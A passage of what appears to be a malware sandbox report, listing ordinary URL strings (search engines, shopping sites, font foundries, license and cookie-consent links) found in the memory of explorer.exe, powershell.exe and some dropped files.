Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.co.uk/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.nate.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.naver.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.naver.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.nifty.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.rediff.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.rediff.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.sify.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&p=
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yam.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search1.taobao.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search2.estadao.com.br/
Source: ~DFFF48C403F4BCBE81.TMP.4.dr	String found in binary or memory: http://searchads.msn.net/.cfm?&&kp=1&
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://searchresults.news.com.au/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://service2.bfast.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.aol.de/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.lycos.de/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.t-online.de/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.web.de/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.web.de/favicon.ico
Source: explorer.exe, 00000024.00000000.976375731.0000000006AD0000.00000002.00000001.sdmp	String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://tw.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://udn.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://udn.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://uk.ask.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://uk.ask.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://uk.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://vachercher.lycos.fr/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://video.globo.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://video.globo.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://web.ask.com/
Source: explorer.exe, 00000024.00000000.976375731.0000000006AD0000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.com
Source: explorer.exe, 00000024.00000000.957734718.0000000002B50000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.co.jp/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.co.uk/
Source: msapplication.xml.4.dr	String found in binary or memory: http://www.amazon.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&keyword=
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&tag=ie8search-20&index=blended&linkCode=qs&c
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.de/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.aol.com/favicon.ico
Source: explorer.exe, 00000024.00000000.982794050.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 0000001A.00000002.1000131477.000001E7AADFF000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ask.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.baidu.com/favicon.ico
Source: explorer.exe, 00000024.00000000.982794050.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.docUrl.com/bar.htm
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 00000024.00000000.982794050.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000024.00000000.982794050.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000024.00000000.982794050.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000024.00000000.982794050.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000024.00000000.982794050.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: explorer.exe, 00000024.00000000.982794050.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000024.00000000.982794050.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000024.00000000.982794050.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000024.00000000.982794050.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000024.00000000.982794050.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000024.00000000.982794050.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000024.00000000.982794050.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000024.00000000.982794050.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000024.00000000.982794050.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 00000024.00000000.982794050.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.tw/
Source: msapplication.xml1.4.dr	String found in binary or memory: http://www.google.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.cz/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.de/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.es/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.fr/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.it/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.pl/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.ru/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.si/
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: http://www.hotmail.msn.com/pii/ReadOutlookEmail/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.iask.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.iask.com/favicon.ico
Source: explorer.exe, 00000024.00000000.982794050.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: msapplication.xml2.4.dr	String found in binary or memory: http://www.live.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&a=
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.nifty.com/favicon.ico
Source: msapplication.xml3.4.dr	String found in binary or memory: http://www.nytimes.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.recherche.aol.fr/
Source: msapplication.xml4.4.dr	String found in binary or memory: http://www.reddit.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 00000024.00000000.982794050.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000024.00000000.982794050.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000024.00000000.982794050.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.target.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 00000024.00000000.982794050.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: msapplication.xml5.4.dr	String found in binary or memory: http://www.twitter.com/
Source: explorer.exe, 00000024.00000000.982794050.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 00000024.00000000.982794050.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.walmart.com/favicon.ico
Source: msapplication.xml6.4.dr	String found in binary or memory: http://www.wikipedia.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.yam.com/favicon.ico
Source: msapplication.xml7.4.dr	String found in binary or memory: http://www.youtube.com/
Source: explorer.exe, 00000024.00000000.982794050.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&Version=2008-06-26&Operation
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://z.about.com/m/a08.ico
Source: iab2Data[1].json.5.dr	String found in binary or memory: https://bealion.com/politica-de-cookies
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.5.dr	String found in binary or memory: https://cdn.cookielaw.org/vendorlist/googleData.json
